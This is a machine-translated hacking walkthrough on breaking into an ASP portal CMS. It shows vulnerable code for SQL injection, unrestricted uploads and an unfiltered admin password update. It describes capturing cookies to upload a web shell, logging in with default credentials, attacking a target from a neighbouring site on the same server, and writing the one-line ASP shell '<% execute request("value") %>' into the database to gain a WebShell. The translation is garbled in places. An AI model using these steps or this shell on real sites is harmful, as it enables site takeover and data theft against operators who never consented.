Analysis of loopholes in portal website construction systems for a long time

Author: Shu Cheng Li Yin♂[Dream]★Swordsman]
Recently, the mobile network 8.0 was found to have a vulnerability, so I drove Internet Explorer to the mobile network official website to see if there was any patch. I found no patch in a circle. I accidentally saw a time-and-Space Network System on the mobile network download ranking. It is said to be the preferred program for the construction of local portal websites. In this case, download it and study it.

Vulnerability cracking security defense
When you get the program, you first test it in the black box. A dialog box is displayed after a single quotation mark is added, as shown in 1. It is estimated that there are anti-injection programs. I found a lot of links and the tests were intercepted. There is no way to do this. Let's check the code. Open the news_view.asp file and you will see the following code at a Glance:

Figure 1

<%
Dim id
Id = trim (request. querystring ("id "))
If not (isnumeric (id) then
Call format_redirect ("news. asp ")
End if
%>
This code first obtains the value of the client variable id in Get mode, but is filtered out by the isnumeric function in the third line, without using the value. Next, the file is called. <! -- # Include file = "include/jk_review.asp" --> this file is changed from the Qiao ke system. For the qiaoke system, the most famous is the Upload Vulnerability. For the Upload Vulnerability, let's not talk about it for the moment. Let's first look at its anti-injection file location. After some exploration, I finally found the safe. asp file called by multiple files, as shown in figure 2.

Figure 2
In this file, I did not find the filter function. I only saw that the instr function was called. This function indicates the position where the first character is returned. When the client browser submits invalid characters, a dialog box is displayed. Most of the variables are filtered by the isnumeric function and cint function. Because there are too many Qiao ke codes, I still haven't found any breakthrough after some time. Let's look at the background, as shown in 3.

Figure 3
I didn't expect that there would be the same verification code as the mobile app in the background, and I couldn't do anything about it. I used the default account password and verification code to log on to the background. I found that the system is very powerful. I uploaded the configuration in the background. I can add the cer extension file in it and get the WebShell at the foreground. However, the Verification Code cannot be cracked. The verification code is stored in the "include/common. asp" file. The idea of getting WebShell in the background is completely blocked. Considering that the Qiao ke system has a precedent for the Upload Vulnerability, check whether this system also has this problem. As we all know about the Qiao ke upload vulnerability, it is mainly because the suffix filtering is not strict, so let's experiment.
To upload a file, you must first register a user. Therefore, I have registered an ahhacker86 user to enter the user center. There is a "publish information" column on the left that can upload images, as shown in figure 4. This is easy to handle. Enable wsockexpert to capture data packets, click to upload images, and quickly capture Cookies. Then, use the domian3.6 client upload program to upload the files. The prompt "Upload successful!" is displayed soon !", However, the results are depressing. The uploaded suffix is changed to gif, So pony cannot use it, as shown in Figure 5.

Figure 4

Figure 5
It seems that there is no way to use the upload here. Then I found another place that can be uploaded. The user has a data modification function, which can upload portraits. Enable wsockexpert again to capture packets. After successfully capturing Cookies, we use domian3.6 to upload again. This time, we didn't prompt that the upload was successful. It is estimated that we will try again. Does this program fix the upload vulnerability? With questions, I opened the link http: // localhost/upload/other/DIY. asp. I was delighted to see the familiar interface and the pony was uploaded successfully! 6. The following operations are clear to everyone! Now the WebShell of this system is ready, but this method is cumbersome. Do you have to register a user to capture packets?

Figure 6


Narrow side note: Get WebShell
Do you know the so-called "narrow side note? In our daily intrusion, if the target site cannot be obtained, we can intrude from another site on the same server and raise the right to obtain the target site. This method is called "Generalized bypass ". Similarly, if a website is safe, but a BBS is 6.0 mobile, do not count on security. This set of programs also has similar problems, the main program is too large, there are a lot of Script Security is not fully taken into account, so that we have the opportunity to take advantage. If you don't talk nonsense, go to the topic. The program has a category "joke" column, and the injection vulnerability exists on the home page. The following is the code of the list. asp file.
<%
Id = request ("id ")
If id = "" then
Response. write "insufficient Parameters"
Response. end
End if
%>
<! -- # Include file = "conn. asp" -->
<%
SQL = "select * from learning where articleid =" & id
Rs. open SQL, conn, 1, 2
If rs. bof or rs. eof then
Response. write "the content is not deleted or does not exist"
Rs. close
Set rs = nothing
Conn. close
Set conn = nothing
Response. end
End if
Rs ("hits") = rs ("hits") + 1
Rs. update
%>

The variable id is obtained from the client and saved as the id. Then, a record set is created to open the database and perform SQL queries. Because the id is not filtered, it is stored in the database for query, which makes it easy to use. Go directly to ah d, and quickly guess the password and account. There are also problems in the background of this topic, because the background is relatively hidden, and it is not easy for administrators to find it. The default account can be used, as shown in figure 7.

Figure 7
The background is very concise. If it is wrong, the database name is ASP suffix. What's more, there is no anti-download table. In this way, we can add a trojan in the background. However, I was wrong in the test results. The content and title of the Trojan failed to be inserted, and the pony was filtered as "<% execute request (" value ") %> ". In a hurry, I checked the source code again and found that there was a segment of filtering code, as shown below.
<% Dim I
For I = 1 to l
Select case mid (str, I, 1)
Case "<"
Result = result + "<"
Case ">"
Result = result + ">"
Case chr (13)
Result = result + "<br>"
Case chr (34)
Result = result + """
Result = result + "&"
Case chr (32)
Result = result + "" %> 〉

This code filters some key HTML characters almost, so it is no wonder that pony has not stored them. It seems that this code is difficult to insert a horse, so I can change a place to insert a horse. For general systems, there is a place that will never be filtered, that is, the place where the admin password is modified in the background.
The system background password modification and column category are the same file "changpass. asp", the Code is as follows.

If request ("method") = "chan" then
If request ("change") = "modify" then
Rs. open "select * from admin where id =" + request ("id"), conn, 1, 3
Rs ("username") = request ("name ")
Rs ("password") = request ("pass ")
Rs. Update
Rs. close
End if
End if

This code modifies the administrator password and user name. It can be found that the database is directly written without any function filtering, so that our pony can be written successfully. Similarly, you can write a sentence without processing the modified category. After writing a classic sentence <% execute request ("value") %>, result 8 is displayed. I'm speechless. It seems that this is not the case. I have to rely on the encrypted pony. After encryption, the pony "batch data is fully inserted into the database successfully>" is inserted and connected to the database address.Http: // localhost/xiaohua. aspTo obtain the WebShell, as shown in figure 9. In this way, the WebShell is obtained again, which is simple and easy. You do not need to register or capture packets.


Figure 8

Figure 9

Thoroughly revolutionizing the time-and-Space Network
The above two methods are enough to cause the system to crash, but if the administrator fixes both methods, how should we do well? In my subsequent network intrusion, I encountered a situation where the above method was not available. In fact, we still have a simpler method, because the topic "Weather" also has a plug-in vulnerability, which is mainly caused by insecure databases. The database file for this topic is "weatherdb. asp", and the database connection file is written as follows:
<% Dim conn
Dim connstr
Dim db
Db = "weatherdb. asp"
Set conn = Server. CreateObject ("ADODB. Connection ")
Connstr = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath ("" & db &"")
Conn. Open connst %>
There is no fault-tolerant statement at all, which leads to a brute-force database vulnerability. Even if the administrator is a bit aware of Security and changes the default database, we can use this vulnerability to obtain the database path, which is really perfect! The following code is added to add. asp:
<%
Set rs = server. CreateObject ("adodb. recordset ")
SQL = "select * from weather"
Rs. Open SQL, conn, 1, 3
Rs. AddNew
Rs ("addresname") = Request ("addresname ")
Rs ("url") = Request ("url ")
Rs ("Addtime") = now ()
Rs. Update
Rs. Close
Set rs = nothing
%>